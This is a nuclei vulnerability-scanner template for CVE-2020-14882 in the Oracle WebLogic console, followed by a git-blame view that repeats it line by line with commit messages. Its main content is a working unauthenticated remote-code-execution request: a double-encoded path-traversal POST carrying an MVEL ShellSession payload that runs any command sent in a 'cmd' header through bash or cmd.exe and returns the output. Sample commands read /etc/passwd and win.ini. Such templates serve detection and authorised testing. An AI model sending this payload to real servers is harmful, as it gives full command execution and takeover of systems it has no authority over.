nuclei-templates/cves/2020/CVE-2020-14882.yaml

id: CVE-2020-14882

info:
  name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
  author: dwisiswant0
  severity: critical
  reference:
    - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
    - https://twitter.com/jas502n/status/1321416053050667009
    - https://youtu.be/JFVDOIL0YtA
    - https://github.com/jas502n/CVE-2020-14882#eg
  description: |
    Vulnerability in the Oracle WebLogic Server
    product of Oracle Fusion Middleware (component: Console).
    Supported versions that are affected are 10.3.6.0.0,
    12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
    Easily exploitable vulnerability allows unauthenticated
    attacker with network access via HTTP to compromise the server.
    Successful attacks of this vulnerability can result in takeover.
  tags: cve,cve2020,oracle,rce,weblogic
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2020-14882

requests:
  - raw:
      - |
        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
        Host: {{Hostname}}
        cmd: {{exec}}
        Content-Type: application/x-www-form-urlencoded; charset=utf-8

        _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29

    payloads:
      exec:
        - "type C:\\Windows\\win.ini"  # Windows
        - "cat /etc/passwd"  # *nix

    matchers-condition: and
    matchers:

      - type: regex
        condition: or
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"

      - type: status
        status:
          - 200
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-14882`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00
			`info:`
			`name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)`
			`author: dwisiswant0`
			`severity: critical`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Put references in the right place 2021-03-11 15:26:35 +00:00			`- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf`
			`- https://twitter.com/jas502n/status/1321416053050667009`
			`- https://youtu.be/JFVDOIL0YtA`
			`- https://github.com/jas502n/CVE-2020-14882#eg`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`description: \|`
			`Vulnerability in the Oracle WebLogic Server`
			`product of Oracle Fusion Middleware (component: Console).`
			`Supported versions that are affected are 10.3.6.0.0,`
			`12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.`
			`Easily exploitable vulnerability allows unauthenticated`
			`attacker with network access via HTTP to compromise the server.`
			`Successful attacks of this vulnerability can result in takeover.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2020,oracle,rce,weblogic`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2020-14882`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00
			`requests:`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00			`- raw:`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`- \|`
			`POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1`
			`Host: {{Hostname}}`
more updates 2021-10-10 01:13:30 +00:00			`cmd: {{exec}}`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`Content-Type: application/x-www-form-urlencoded; charset=utf-8`

			_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00
			`payloads:`
			`exec:`
			`- "type C:\\Windows\\win.ini" # Windows`
			`- "cat /etc/passwd" # *nix`

:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`matchers-condition: and`
			`matchers:`
more updates 2021-10-10 01:13:30 +00:00
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`- type: regex`
more updates 2021-10-10 01:13:30 +00:00			`condition: or`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`- "\\[(font\|extension\|file)s\\]"`
payload update 2021-09-12 14:52:03 +00:00
:fire: Update CVE-2020-14882 payload & with positive matchers 2020-11-02 07:23:12 +00:00			`- type: status`
			`status:`
			`- 200`